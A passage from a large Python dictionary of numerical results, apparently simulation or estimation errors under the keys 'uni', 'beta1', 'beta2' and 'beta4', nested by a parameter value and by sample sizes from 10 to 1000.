{'uni': 0.7376491727942917, 'beta1': 0.701426624157432, 'beta2': 1.0318845897107891, 'beta4': [0.16199617337961164, 1.4429581649223886]}}, 20: {1000: {'uni': 0.8019976350067, 'beta1': 0.8332259715318519, 'beta2': 1.1366607302655636, 'beta4': [0.08995158287931063, 2.523474384380298]}, 750: {'uni': 0.8240765825127023, 'beta1': 0.6078699965037111, 'beta2': 1.3066093350540289, 'beta4': [0.09399747363931381, 2.5986801791624394]}, 500: {'uni': 0.9974083513430438, 'beta1': 0.5023448507895341, 'beta2': 1.5764142648731303, 'beta4': [0.08892101043100277, 2.4498259406795078]}, 400: {'uni': 0.65987087499712, 'beta1': 1.0021947304857353, 'beta2': 1.0133412632320413, 'beta4': [0.09297169783242988, 2.203514161015423]}, 300: {'uni': 0.8346407450005573, 'beta1': 0.4858229844832691, 'beta2': 1.7026411990816142, 'beta4': [0.09176193095098974, 2.4706819211929543]}, 200: {'uni': 0.6097035714025173, 'beta1': 0.5346254040464333, 'beta2': 1.316817789777299, 'beta4': [0.09682457806892368, 2.242178483680891]}, 150: {'uni': 0.7118891887622544, 'beta1': 0.73757966982389, 'beta2': 1.756042304492378, 'beta4': [0.09424018725867234, 2.456661404213161]}, 100: {'uni': 0.7037802965100136, 'beta1': 1.3606834631757059, 'beta2': 1.3043054700351289, 'beta4': [0.10217585159933665, 2.3827792567388353]}, 75: {'uni': 0.8055662843703303, 'beta1': 0.46287340020535195, 'beta2': 1.2503612065373881, 'beta4': [0.10490481871712838, 2.816915331499867]}, 50: {'uni': 0.8246742261483321, 'beta1': 0.6187824029797957, 'beta2': 1.3150729181082033, 'beta4': [0.08275958000501926, 2.42227261187819]}, 30: {'uni': 0.6868898977184308, 'beta1': 0.40962747269539135, 'beta2': 1.3439023117013336, 'beta4': [0.10164499360892393, 1.9097766052880618]}, 20: {'uni': 0.554678594337485, 'beta1': 0.5266918425509246, 'beta2': 1.3548613513588386, 'beta4': [0.10398481149694526, 1.9876903951414775]}, 10: {'uni': 1.0446131131368517, 'beta1': 0.7747696875546464, 'beta2': 1.8108754189944798, 'beta4': [0.15817077417264236, 1.7127206843317608]}}, 10: {1000: {'uni': 1.6849860990985794, 'beta1': 2.7439137403319105, 'beta2': 2.734111069331994, 'beta4': [0.18923271560035437, 5.02925901860904]}, 750: {'uni': 1.830761737169992, 'beta1': 2.5751354681579217, 'beta2': 2.663574129357734, 'beta4': [0.16303669261193782, 3.6181870370037714]}, 500: {'uni': 3.2685644351081553, 'beta1': 2.497162317342663, 'beta2': 3.831873093092898, 'beta4': [0.19152027457838408, 5.277460841781809]}, 400: {'uni': 1.8175906273340954, 'beta1': 5.798628259006607, 'beta2': 2.265996141562548, 'beta4': [0.18666272909519135, 4.311034510201182]}, 300: {'uni': 1.752330482850812, 'beta1': 2.446640937487978, 'beta2': 3.156170480487465, 'beta4': [0.19335453547615575, 4.062291176554196]}, 200: {'uni': 2.585300579248603, 'beta1': 3.8614772252430134, 'beta2': 2.427817506054191, 'beta4': [0.199460824777887, 4.721530100708777]}, 150: {'uni': 1.8997609248765257, 'beta1': 2.003172066142217, 'beta2': 2.9051765798592735, 'beta4': [0.18230429899009304, 3.829273701760521]}, 100: {'uni': 2.225330605252653, 'beta1': 3.1330535103231005, 'beta2': 3.866579491183401, 'beta4': [0.1914076126447997, 5.931444497716789]}, 75: {'uni': 1.9375681374299873, 'beta1': 3.2234217980405666, 'beta2': 2.8971241927601485, 'beta4': [0.1910362420977265, 4.146413907380423]}, 50: {'uni': 2.1226998033229885, 'beta1': 2.5656176115610667, 'beta2': 2.663512620988418, 'beta4': [0.16892315886491896, 4.140040221647824]}, 30: {'uni': 2.7067057347613, 'beta1': 2.114623008671077, 'beta2': 3.0476671138328455, 'beta4': [0.1765011431579746, 3.5581193469388115]}, 20: {'uni': 1.6776878433144786, 'beta1': 2.649907170376919, 'beta2': 3.214279820200537, 'beta4': [0.14485132858460728, 3.385563064254459]}, 10: {'uni': 1.7640526663634954, 'beta1': 2.6540089660589876, 'beta2': 4.178786013879768, 'beta4': [0.20634373982749682, 2.921191233260417]}}}, 0.01: {1000: {1000: {'uni': 0.012988144078803505, 'beta1': 0.00038944275185018686, 'beta2': 0.2739412257196214, 'beta4': [0.001901429926485662, 1.0744670600689628]}, 750: {'uni': 0.018954493311881516, 'beta1': 0.0004064874368649216, 'beta2': 0.28164334341957836, 'beta4': [0.0027292845187166957, 1.0598748530262019]}, 500: {'uni': 0.03227328882297064, 'beta1': 0.0012917244174020107, 'beta2': 0.27037257115863184, 'beta4': [0.0038621658913706495, 1.0547470718911076]}, 400: {'uni': 0.03433464054395813, 'beta1': 0.002369780517218288, 'beta2': 0.28063958889740204, 'beta4': [0.004902554260141074, 1.049709686035498]}, 300: {'uni': 0.03831461561224829, 'beta1': 0.0037592167513096075, 'beta2': 0.29835323043874173, 'beta4': [0.007071102509495777, 1.0426217515350968]}, 200: {'uni': 0.05674481720406174, 'beta1': 0.005284832803397361, 'beta2': 0.3427814820719719, 'beta4': [0.009425129653536651, 1.0391934783953622]}, 150: {'uni': 0.08834898466342368, 'beta1': 0.01244014911343485, 'beta2': 0.3905746763051995, 'beta4': [0.012342493157189289, 1.0348233308668668]}, 100: {'uni': 0.11894024946831482, 'beta1': 0.02444975073959859, 'beta2': 0.44907614468337353, 'beta4': [0.019659596279589155, 1.028889046296725]}, 75: {'uni': 0.1527862700499143, 'beta1': 0.04787451628654083, 'beta2': 0.4787033135597648, 'beta4': [0.029747587227536555, 1.0245077390872745]}, 50: {'uni': 0.2426038704397449, 'beta1': 0.0782378615031597, 'beta2': 0.5218056644958682, 'beta4': [0.041527131802373184, 1.0224094385417244]}, 30: {'uni': 0.3390533680971421, 'beta1': 0.18939106161176048, 'beta2': 0.6846835998957418, 'beta4': [0.056675214880820765, 1.0166970485545934]}, 20: {'uni': 0.45235784655368927, 'beta1': 0.3714038453778036, 'beta2': 0.7011438160594685, 'beta4': [0.08848504553932762, 1.014212197651508]}, 10: {'uni': 0.7798616064607444, 'beta1': 0.6626215824023616, 'beta2': 0.854942257338083, 'beta4': [0.1361740799714233, 1.0112064148732012]}}, 750: {1000: {'uni': 0.014111659450113783, 'beta1': 0.0005193837132983345, 'beta2': 0.3041417560035209, 'beta4': [0.0021059808213720623, 1.089260808726159]}, 750: {'uni': 0.01776621568011013, 'beta1': 0.0005404605453736952, 'beta2': 0.30632535812118766, 'beta4': [0.002608330400828606, 1.075273109299807]}, 500: {'uni': 0.028705411835050567, 'beta1': 0.0009701162458206792, 'beta2': 0.293387533478566, 'beta4': [0.0035869489765737637, 1.0736332892832816]}, 400: {'uni': 0.035925270100480564, 'beta1': 0.002115883346584126, 'beta2': 0.28846361046306584, 'beta4': [0.0053041492994923365, 1.0685684661263208]}, 300: {'uni': 0.04739663294754829, 'beta1': 0.003944792065230057, 'beta2': 0.3262201641618077, 'beta4': [0.005481018761212053, 1.06674288435139]}, 200: {'uni': 0.07323025971109642, 'beta1': 0.007079292499444228, 'beta2': 0.3504479078456703, 'beta4': [0.008241651578483802, 1.0545837824070112]}, 150: {'uni': 0.07891186837596025, 'beta1': 0.019368677322849078, 'beta2': 0.3677325048079892, 'beta4': [0.01125347103088656, 1.0474333377718406]}, 100: {'uni': 0.11954949574624353, 'beta1': 0.02051741147566948, 'beta2': 0.4607118280456165, 'beta4': [0.018024830416066322, 1.038629659877778]}, 75: {'uni': 0.1667857566555556, 'beta1': 0.03694914894551043, 'beta2': 0.4922451884656646, 'beta4': [0.023016121704478844, 1.0328691452557426]}, 50: {'uni': 0.267023428032651, 'beta1': 0.07890588955448231, 'beta2': 0.5378520535647412, 'beta4': [0.03789863377657755, 1.0276001043725385]}, 30: {'uni': 0.33785390816595817, 'beta1': 0.24746683430732205, 'beta2': 0.6249081272448354, 'beta4': [0.06161697678822258, 1.021437251450835]}, 20: {'uni': 0.48292750740180024, 'beta1': 0.2717511395739313, 'beta2': 0.6945127698879909, 'beta4': [0.08268620779342578, 1.0216636840969495]}, 10: {'uni': 0.7248197547615234, 'beta1': 0.6245977329525259, 'beta2': 0.8875678105634364, 'beta4': [0.1421881432843648, 1.0143655081623668]}}, 500: {1000: {'uni': 0.02188975323112398, 'beta1': 0.0017453824253913159, 'beta2': 0.2956035109830917, 'beta4': [0.003767105090318207, 1.1268252528300466]}, 750: {'uni': 0.02357228780744032, 'beta1': 0.0010166197623719666, 'beta2': 0.29909761062079904, 'beta4': [0.004875872603854908, 1.1245773629752243]}, 500: {'uni': 0.026837036395264052, 'beta1': 0.0013010746719904127, 'beta2': 0.3014218767173777, 'beta4': [0.003665030466863662, 1.1012534822690934]}, 400: {'uni': 0.028163152714100657, 'beta1': 0.001967008933802825, 'beta2': 0.2916764354442436, 'beta4': [0.006081151372860138, 1.0973592614277135]}, 300: {'uni': 0.04039589266243756, 'beta1': 0.0025297031214923577, 'beta2': 0.3291987120650441, 'beta4': [0.006762903272845259, 1.0927311729646423]}, 200: {'uni': 0.06381560712414723, 'beta1': 0.008711588337987476, 'beta2': 0.349388068575829, 'beta4': [0.009518281554600943, 1.0705205650736693]}, 150: {'uni': 0.08822872644657972, 'beta1': 0.012625655119434065, 'beta2': 0.36359164688986806, 'beta4': [0.0122975587808102, 1.066828776680399]}, 100: {'uni': 0.12034086569249816, 'beta1': 0.028199486576761034, 'beta2': 0.4013937953505733, 'beta4': [0.019410294600082315, 1.0546743195542243]}, 75: {'uni': 0.15710173020411988, 'beta1': 0.05948850797839798, 'beta2': 0.4602254974955219, 'beta4': [0.025921724099794863, 1.0517010799471413]}, 50: {'uni': 0.2532312265823954, 'beta1': 0.07607149041242904, 'beta2': 0.5570252079040533, 'beta4': [0.033107476011882166, 1.0439643502035127]}, 30: {'uni': 0.3533095624701312, 'beta1': 0.17481473091875682, 'beta2': 0.6082250929487117, 'beta4': [0.06369605726718264, 1.0356758375491901]}, 20: {'uni': 0.4570589338099327, 'beta1': 0.3041261325532901, 'beta2': 0.7013060580251537, 'beta4': [0.09388192904197612, 1.02753591382958]}, 10: {'uni': 0.7060683718900814, 'beta1': 0.6155479784933189, 'beta2': 0.8355785086184536, 'beta4': [0.13642816215229916, 1.0217206967991093]}}, 400: {1000: {'uni': 0.028838920421234225, 'beta1': 0.002023990721398416, 'beta2': 0.3595884886124153, 'beta4': [0.004349264377807316, 1.1499553996186684]}, 750: {'uni': 0.031760309280321905, 'beta1': 0.0017463269958980757, 'beta2': 0.347593944893794, 'beta4': [0.004966482944978197, 1.1387788815091806]}, 500: {'uni': 0.029639682537053992, 'beta1': 0.0021690481189058836, 'beta2': 0.36575693930787684, 'beta4': [0.004787347135222721, 1.143960636467822]}, 400: {'uni': 0.03448428077909005, 'beta1': 0.001679178738135301, 'beta2': 0.3332601516725951, 'beta4': [0.005365773889334185, 1.1224023010554964]}, 300: {'uni': 0.03728507705357348, 'beta1': 0.003421016079149095, 'beta2': 0.35258759568773423, 'beta4': [0.006769452240699886, 1.0992128217714925]}, 200: {'uni': 0.05937386031855901, 'beta1': 0.008088451915504932, 'beta2': 0.34891296908227415, 'beta4': [0.009966202932037182, 1.0926275641542096]}, 150: {'uni': 0.07494825539591718, 'beta1': 0.009900336507182075, 'beta2': 0.3633810337591094, 'beta4': [0.014015410676247208, 1.0756766254279038]}, 100: {'uni': 0.1452740820402087, 'beta1': 0.04566624562697337, 'beta2': 0.4244085797936966, 'beta4': [0.017619373414129016, 1.0838082958740982]}, 75: {'uni': 0.15759696343829202, 'beta1': 0.03295314139475574, 'beta2': 0.49107280365146033, 'beta4': [0.026961926104242254, 1.0616881249470593]}, 50: {'uni': 0.19965377944271542, 'beta1': 0.09170708993967416, 'beta2': 0.5174241834899962, 'beta4': [0.034885863449721756, 1.0533340818568644]}, 30: {'uni': 0.3911037951130236, 'beta1': 0.2008621720408328, 'beta2': 0.5813834794397994, 'beta4': [0.06621448432105294, 1.0418362843449036]}, 20: {'uni': 0.4532644917880779, 'beta1': 0.31046491235637047, 'beta2': 0.6983812924974165, 'beta4': [0.08584145551321705, 1.0397579843043205]}, 10: {'uni': 0.7049112936255675, 'beta1': 0.5619870648762287, 'beta2': 0.8624110416345726, 'beta4': [0.1420336605742772, 1.0260483032144943]}}, 300: {1000: {'uni': 0.0477506434275743, 'beta1': 0.002656018923794836, 'beta2': 0.38169507431662775, 'beta4': [0.006751240462940516, 1.2044384118076963]}, 750: {'uni': 0.035866440402403874, 'beta1': 0.0025682164531108864, 'beta2': 0.34754934812720045, 'beta4': [0.0060399489557519375, 1.1780336640262834]}, 500: {'uni': 0.0429976433778337, 'beta1': 0.0026997677700779025, 'beta2': 0.3497225195634406, 'beta4': [0.007766880718984553, 1.1714570291435575]}, 400: {'uni': 0.03796627964983832, 'beta1': 0.002680918831818506, 'beta2': 0.31845072684018694, 'beta4': [0.007637211923669038, 1.1767951740193134]}, 300: {'uni': 0.047954341706110834, 'beta1': 0.0040228007949967785, 'beta2': 0.3915189178090604, 'beta4': [0.008341049725251948, 1.1413934344116414]}, 200: {'uni': 0.058801039052903466, 'beta1': 0.008131127056643357, 'beta2': 0.3604135850986866, 'beta4': [0.009896706931841125, 1.1266276510964888]}, 150: {'uni': 0.07601882623660774, 'beta1': 0.009681047272849304, 'beta2': 0.3807318897695535, 'beta4': [0.013563834359170562, 1.1052335637146984]}, 100: {'uni': 0.10841635391980659, 'beta1': 0.02419096018981847, 'beta2': 0.42051425698862294, 'beta4': [0.02332073317446744, 1.1007862236489643]}, 75: {'uni': 0.15644575063485539, 'beta1': 0.04333966354385248, 'beta2': 0.4510221433433015, 'beta4': [0.025484265648400898, 1.0826793645564343]}, 50: {'uni': 0.22229790326206228, 'beta1': 0.1194104696114188, 'beta2': 0.4972862665901895, 'beta4': [0.033032126852486986, 1.0680192364892767]}, 30: {'uni': 0.3421584222803109, 'beta1': 0.19426053661209747, 'beta2': 0.5991003031397995, 'beta4': [0.05774687896095791, 1.0585791153399502]}, 20: {'uni': 0.41000310363205883, 'beta1': 0.2872927401171547, 'beta2': 0.6791792500576637, 'beta4': [0.08202980551373394, 1.0494588632705306]}, 10: {'uni': 0.71394883730954, 'beta1': 0.6012605316921776, 'beta2': 0.8215291167423904, 'beta4': [0.13552082196825826, 1.032384877072474]}}, 200: {1000: {'uni': 0.05637428762936589, 'beta1': 0.009217193420871453, 'beta2': 0.4051235658647831, 'beta4': [0.009264717821869932, 1.255668494974553]}, 750: {'uni': 0.06205625295675565, 'beta1': 0.006241707563085184, 'beta2': 0.40628981422557625, 'beta4': [0.01166396870680152, 1.2401049601104341]}, 500: {'uni': 0.06620774051688502, 'beta1': 0.011631472592465388, 'beta2': 0.4086508125338102, 'beta4': [0.007982398419828483, 1.2123535892253303]}, 400: {'uni': 0.0557159019556888, 'beta1': 0.0070003045875467775, 'beta2': 0.4479874895263648, 'beta4': [0.01377141708582481, 1.217623150358333]}, 300: {'uni': 0.057193255915006416, 'beta1': 0.007083152253381874, 'beta2': 0.3989165098362032, 'beta4': [0.009459881899006482, 1.2241605731085128]}, 200: {'uni': 0.0655493345741656, 'beta1': 0.007667494082330394, 'beta2': 0.432352490564409, 'beta4': [0.011521818555387774, 1.179336090260994]}, 150: {'uni': 0.07708595959479046, 'beta1': 0.010004943140099752, 'beta2': 0.41657253266663674, 'beta4': [0.01604343437557773, 1.1583265664784832]}, 100: {'uni': 0.1263165132491358, 'beta1': 0.021544496545364552, 'beta2': 0.4433791705263855, 'beta4': [0.019640660826383667, 1.1432617638709475]}, 75: {'uni': 0.13284213618342994, 'beta1': 0.03353682532833947, 'beta2': 0.4463651381186589, 'beta4': [0.024553127311670607, 1.1144945057044657]}, 50: {'uni': 0.20031721347214956, 'beta1': 0.10486774187747581, 'beta2': 0.5246839387173443, 'beta4': [0.034818327742525974, 1.1157231794606]}, 30: {'uni': 0.31301904620451293, 'beta1': 0.1886326936481399, 'beta2': 0.6187788281549748, 'beta4': [0.061042826858162515, 1.08255899857378]}, 20: {'uni': 0.461074120032512, 'beta1': 0.32435297663532797, 'beta2': 0.6749616321255197, 'beta4': [0.0878038173182829, 1.0723825999562786]}, 10: {'uni': 0.7327323930086018, 'beta1': 0.6021409002552052, 'beta2': 0.8163811901265174, 'beta4': [0.13141861102455427, 1.0566349108690218]}}, 150: {1000: {'uni': 0.067317033122647, 'beta1': 0.014610653548333328, 'beta2': 0.41423990594181115, 'beta4': [0.015195465900901773, 1.2975972495921606]}, 750: {'uni': 0.07134739771277643, 'beta1': 0.01297675226601242, 'beta2': 0.4449985726026145, 'beta4': [0.012702984043174723, 1.332657446897552]}, 500: {'uni': 0.07158654805341536, 'beta1': 0.013205514989078588, 'beta2': 0.47765967888624855, 'beta4': [0.012293972130509437, 1.3157095294645398]}, 400: {'uni': 0.07034182650532116, 'beta1': 0.01407065712769308, 'beta2': 0.4931374751253587, 'beta4': [0.014390288214085094, 1.2612997638466985]}, 300: {'uni': 0.0668930803759735, 'beta1': 0.01552094864787745, 'beta2': 0.4352322164574502, 'beta4': [0.016111201075420335, 1.2999205241316818]}, 200: {'uni': 0.08210671115008272, 'beta1': 0.014309982621535088, 'beta2': 0.4229267072174695, 'beta4': [0.013810958058404505, 1.2279022666381392]}, 150: {'uni': 0.0819048770127292, 'beta1': 0.014083915977824326, 'beta2': 0.4455770748001402, 'beta4': [0.016448989256336397, 1.2261023328679816]}, 100: {'uni': 0.1124619227831381, 'beta1': 0.02212891084615586, 'beta2': 0.43315186256637916, 'beta4': [0.018516927750900816, 1.1990428526671064]}, 75: {'uni': 0.17413627406404164, 'beta1': 0.04830138338528511, 'beta2': 0.4614161459404568, 'beta4': [0.024628147211136243, 1.1682951226810308]}, 50: {'uni': 0.19441361375983962, 'beta1': 0.09555994518728896, 'beta2': 0.5085726037388353, 'beta4': [0.04000423309857408, 1.133646779809821]}, 30: {'uni': 0.3596328489794518, 'beta1': 0.23345596980686195, 'beta2': 0.602035328072322, 'beta4': [0.05595016121396317, 1.1063362253083466]}, 20: {'uni': 0.49940022824485364, 'beta1': 0.2718272917375905, 'beta2': 0.6917953420150722, 'beta4': [0.0888019052729563, 1.0940863023258154]}, 10: {'uni': 0.7640204794969943, 'beta1': 0.60836577588252, 'beta2': 0.8377569007699075, 'beta4': [0.13896115419536065, 1.0695729688122164]}}, 100: {1000: {'uni': 0.11821762730536435, 'beta1': 0.047083881271799286, 'beta2': 0.4767329414414302, 'beta4': [0.019696898025009797, 1.3759780450899495]}, 750: {'uni': 0.166497002146877, 'beta1': 0.030191650365528174, 'beta2': 0.5745771850100575, 'beta4': [0.01874142585554488, 1.4019321119063006]}, 500: {'uni': 0.1141489883572298, 'beta1': 0.022886589383535046, 'beta2': 0.5059188810811766, 'beta4': [0.023892329918408214, 1.4176836808914035]}, 400: {'uni': 0.10757279402523523, 'beta1': 0.025910744712307768, 'beta2': 0.47516791997531455, 'beta4': [0.024887362134068027, 1.3407564518745063]}, 300: {'uni': 0.11205473228712978, 'beta1': 0.027816294963348084, 'beta2': 0.4595203252789575, 'beta4': [0.02102816906813093, 1.3896095092313074]}, 200: {'uni': 0.1392639018340233, 'beta1': 0.03466261671448098, 'beta2': 0.5064836388671088, 'beta4': [0.019827730733462973, 1.320973379428104]}, 150: {'uni': 0.11172731925062222, 'beta1': 0.03045757437870108, 'beta2': 0.5429801538798318, 'beta4': [0.018311927090665446, 1.2966994614956564]}, 100: {'uni': 0.1417705961325182, 'beta1': 0.02776033911186053, 'beta2': 0.5135092406613353, 'beta4': [0.021989948671619727, 1.2844512305552225]}, 75: {'uni': 0.16977766093730104, 'beta1': 0.04538718671723866, 'beta2': 0.5048319481429052, 'beta4': [0.025361562349700335, 1.2253436336047208]}, 50: {'uni': 0.21773281447174667, 'beta1': 0.12655947351187494, 'beta2': 0.5958498671576513, 'beta4': [0.04232872037917144, 1.2340478264352763]}, 30: {'uni': 0.3857845219796272, 'beta1': 0.16290330189484536, 'beta2': 0.5970726414958795, 'beta4': [0.06907454580959214, 1.181378758222426]}, 20: {'uni': 0.5361371234035757, 'beta1': 0.3035233614902238, 'beta2': 0.6522890347608998, 'beta4': [0.0820029520321425, 1.152442746950051]}, 10: {'uni': 0.701243951130363, 'beta1': 0.5876166702780768, 'beta2': 0.8498127976808606, 'beta4': [0.13423588905558106, 1.108482890069536]}}, 75: {1000: {'uni': 0.1504497409553797, 'beta1': 0.05778886589789175, 'beta2': 0.5689795075236423, 'beta4': [0.025579604139058413, 1.502171976116502]}, 750: {'uni': 0.1656421417501711, 'beta1': 0.044118094938877105, 'beta2': 0.5308608243630025, 'beta4': [0.025236193283323678, 1.5214092977699725]}, 500: {'uni': 0.1406288013165275, 'beta1': 0.04710819524731978, 'beta2': 0.6294260138397421, 'beta4': [0.03263872467003944, 1.466691104643992]}, 400: {'uni': 0.15260582744474926, 'beta1': 0.049746732140211046, 'beta2': 0.5786004110828491, 'beta4': [0.03002446814907474, 1.4657161105126315]}, 300: {'uni': 0.17139718657612807, 'beta1': 0.043265461012224546, 'beta2': 0.598207639599414, 'beta4': [0.02535836803938531, 1.4335637902113987]}, 200: {'uni': 0.1621007031460252, 'beta1': 0.060715336606847865, 'beta2': 0.627958646227533, 'beta4': [0.02854988898787995, 1.414080068290809]}, 150: {'uni': 0.15657389926793341, 'beta1': 0.04517196769162301, 'beta2': 0.6008731596546857, 'beta4': [0.024001517469219674, 1.4033912381741407]}, 100: {'uni': 0.20078010791468953, 'beta1': 0.0638685270180855, 'beta2': 0.6024611592669924, 'beta4': [0.026687989153733143, 1.3684372461164178]}, 75: {'uni': 0.19558911614822283, 'beta1': 0.04127156075089937, 'beta2': 0.6219872948600622, 'beta4': [0.02530115353980352, 1.3504751064168508]}, 50: {'uni': 0.24945016241095797, 'beta1': 0.09548932332721162, 'beta2': 0.5704743061455884, 'beta4': [0.03469103695069554, 1.2910941153233388]}, 30: {'uni': 0.3843775697870882, 'beta1': 0.2162354295470449, 'beta2': 0.7225395232778488, 'beta4': [0.06097975411870599, 1.26014709077903]}, 20: {'uni': 0.4608099490730844, 'beta1': 0.377609439074759, 'beta2': 0.6828014075803406, 'beta4': [0.0845414617819174, 1.2220498105221698]}, 10: {'uni': 0.6957575487038375, 'beta1': 0.5817711102357613, 'beta2': 0.8159662327945509, 'beta4': [0.1456865472262332, 1.1761074832049092]}}, 50: {1000: {'uni': 0.2171563016332781, 'beta1': 0.1119882220067852, 'beta2': 0.7295328909426251, 'beta4': [0.036596828296387295, 1.6695178637251924]}, 750: {'uni': 0.31980644420219206, 'beta1': 0.08356402070230286, 'beta2': 0.6568872602016991, 'beta4': [0.03644848778622732, 1.664721881332084]}, 500: {'uni': 0.2787119122221463, 'beta1': 0.08564305576207892, 'beta2': 0.8076205045555513, 'beta4': [0.0372663869694284, 1.5845679652678826]}, 400: {'uni': 0.31512954719118724, 'beta1': 0.09191934849852293, 'beta2': 0.6399963438304054, 'beta4': [0.044356775686283226, 1.6887226611881236]}, 300: {'uni': 0.2978852335601706, 'beta1': 0.11065776415347438, 'beta2': 0.7109359356279316, 'beta4': [0.04377085876988734, 1.6943468662995624]}, 200: {'uni': 0.2698837516337762, 'beta1': 0.08657074634623589, 'beta2': 0.8781098176902961, 'beta4': [0.03965972203722568, 1.6965554757595365]}, 150: {'uni': 0.29282860454290066, 'beta1': 0.12956993080392998, 'beta2': 0.8337280661846921, 'beta4': [0.03678242047033739, 1.5699018695803737]}, 100: {'uni': 0.2996686665157128, 'beta1': 0.09487879758008413, 'beta2': 0.7989016053228302, 'beta4': [0.038780796201137155, 1.4885204427669143]}, 75: {'uni': 0.26825135650124593, 'beta1': 0.1304663803307884, 'beta2': 0.6382631197739325, 'beta4': [0.038703446172140665, 1.548809371611096]}, 50: {'uni': 0.23328719602827164, 'beta1': 0.1279056112762378, 'beta2': 0.7337035166527172, 'beta4': [0.04461719221729034, 1.4355747808596746]}, 30: {'uni': 0.31766342420836724, 'beta1': 0.2073845454902525, 'beta2': 0.8664281705960387, 'beta4': [0.061479928757434674, 1.4337600600297795]}, 20: {'uni': 0.49857944269872956, 'beta1': 0.37194117505787716, 'beta2': 0.7303859611553145, 'beta4': [0.07943618683979671, 1.3507146157854548]}, 10: {'uni': 0.6740063613368987, 'beta1': 0.5875002880392719, 'beta2': 0.8294800540083995, 'beta4': [0.1423435773909963, 1.2455677102577796]}}, 30: {1000: {'uni': 0.4041367657774476, 'beta1': 0.3891252626085872, 'beta2': 0.8917332171691094, 'beta4': [0.06069384516805439, 2.0878809853058136]}, 750: {'uni': 0.6063487450248459, 'beta1': 0.28515250770408407, 'beta2': 0.907323908221825, 'beta4': [0.06777651085585552, 2.165511890410776]}, 500: {'uni': 0.44887745342739666, 'beta1': 0.20142163124187815, 'beta2': 1.0586969462772107, 'beta4': [0.06112703890643645, 1.9450821248923096]}, 400: {'uni': 0.3671219293884009, 'beta1': 0.29439578709842673, 'beta2': 0.8625000041807787, 'beta4': [0.07096987575608635, 2.292088965648115]}, 300: {'uni': 0.5618374463091304, 'beta1': 0.21529313809975378, 'beta2': 0.9323116397814922, 'beta4': [0.060725063535657646, 1.9415618379545583]}, 200: {'uni': 0.46281000290851027, 'beta1': 0.31836371463471935, 'beta2': 1.074339767464387, 'beta4': [0.06544350048523691, 2.4401579712107853]}, 150: {'uni': 0.45065414372867557, 'beta1': 0.2254781448755926, 'beta2': 0.921098529958321, 'beta4': [0.07493682860369427, 1.9884601872702625]}, 100: {'uni': 0.4818990994754038, 'beta1': 0.22179781725829084, 'beta2': 0.9626354691244079, 'beta4': [0.0673868816555839, 1.8541827841878982]}, 75: {'uni': 0.6113357053235765, 'beta1': 0.2970066066146257, 'beta2': 1.107979555092765, 'beta4': [0.07010660573358148, 1.8919338680785487]}, 50: {'uni': 0.4576323533580108, 'beta1': 0.21108840567426887, 'beta2': 1.0350342422943783, 'beta4': [0.07781723853206345, 1.7709725863663965]}, 30: {'uni': 0.4729226012285906, 'beta1': 0.2967398499465227, 'beta2': 1.1720397435138796, 'beta4': [0.10061020478239008, 1.5666290649592491]}, 20: {'uni': 0.5047530706836073, 'beta1': 0.3828449749320704, 'beta2': 0.9959358178346716, 'beta4': [0.09150679086653213, 1.5273098854169376]}, 10: {'uni': 0.7253485793653165, 'beta1': 0.7131398068127759, 'beta2': 1.154279478845462, 'beta4': [0.15865868787798984, 1.4651227700649136]}}, 20: {1000: {'uni': 0.8893011051968421, 'beta1': 0.48029489890964144, 'beta2': 1.138570061072868, 'beta4': [0.12016297491888765, 2.7450044819730346]}, 750: {'uni': 0.7842878860829648, 'beta1': 0.5280047378600626, 'beta2': 0.9907178324045341, 'beta4': [0.08074449655529863, 2.4628845216345465]}, 500: {'uni': 0.6495364657918996, 'beta1': 0.5571645541550105, 'beta2': 1.2153026888564329, 'beta4': [0.11212718774146183, 2.4826912142541158]}, 400: {'uni': 0.6790833244406554, 'beta1': 0.688222696542953, 'beta2': 1.0940594366814973, 'beta4': [0.09612572731484217, 2.6378171658296]}, 300: {'uni': 0.7497979123647319, 'beta1': 0.673346361400717, 'beta2': 1.2111769266572192, 'beta4': [0.10650625900424332, 2.662378719953278]}, 200: {'uni': 0.7782799236279321, 'beta1': 0.5066133040115538, 'beta2': 1.5983486399311722, 'beta4': [0.10154176948982443, 2.18300393332201]}, 150: {'uni': 0.769284858919313, 'beta1': 0.7960425816447904, 'beta2': 1.6078106374025654, 'beta4': [0.09700106178564268, 2.47424633203668]}, 100: {'uni': 0.6623091331581044, 'beta1': 0.5188424165311809, 'beta2': 1.3778317192785996, 'beta4': [0.08048551825905041, 2.5782845351068673]}, 75: {'uni': 0.7617937241966218, 'beta1': 0.5291163469257404, 'beta2': 1.6061108763727754, 'beta4': [0.08975903590242737, 2.325750777699574]}, 50: {'uni': 0.7115988582438708, 'beta1': 0.5693966556621504, 'beta2': 1.3152266488463573, 'beta4': [0.08495826703441907, 2.142722449577546]}, 30: {'uni': 0.7034134256344454, 'beta1': 0.6037393201713395, 'beta2': 1.3551563258206014, 'beta4': [0.0931583019513541, 2.360556989567204]}, 20: {'uni': 0.7100758447852602, 'beta1': 0.6586909629351826, 'beta2': 1.3951430901746895, 'beta4': [0.08885578581538985, 2.13027761302959]}, 10: {'uni': 0.8763687869636916, 'beta1': 0.6621901686619684, 'beta2': 1.4397320052133586, 'beta4': [0.15413113554127414, 1.8900352885932123]}}, 10: {1000: {'uni': 2.0273680826515523, 'beta1': 2.359035556551498, 'beta2': 3.672756126961876, 'beta4': [0.2213782321311552, 4.345382606735576]}, 750: {'uni': 2.3490519213259775, 'beta1': 2.0119800010343014, 'beta2': 2.8645485706294185, 'beta4': [0.23441342363526224, 3.7887379248049053]}, 500: {'uni': 2.389001125272668, 'beta1': 1.8872657257523238, 'beta2': 2.6719189810271513, 'beta4': [0.20011018110379586, 3.6970066494557168]}, 400: {'uni': 2.255684049218137, 'beta1': 2.9094381086720404, 'beta2': 3.0637241743113166, 'beta4': [0.21926471174607634, 5.339869195559868]}, 300: {'uni': 1.7536409747411805, 'beta1': 3.849583292887527, 'beta2': 3.175605250509971, 'beta4': [0.17907412584005683, 4.480746714602472]}, 200: {'uni': 1.773862091385912, 'beta1': 4.078747745882778, 'beta2': 3.461277444009251, 'beta4': [0.19496297219634695, 3.886693122290411]}, 150: {'uni': 2.265039971782233, 'beta1': 3.152798513179202, 'beta2': 3.4393350792778667, 'beta4': [0.15566060788335714, 4.093634455518538]}, 100: {'uni': 2.366653853665828, 'beta1': 4.4934014356822445, 'beta2': 3.800083106177682, 'beta4': [0.16039428725680271, 3.9289581935779605]}, 75: {'uni': 2.2874534331959575, 'beta1': 3.07963290214728, 'beta2': 3.0312126576316696, 'beta4': [0.19916744373968726, 4.206702906032036]}, 50: {'uni': 2.2089566943358725, 'beta1': 4.267458229985183, 'beta2': 3.5008369677013973, 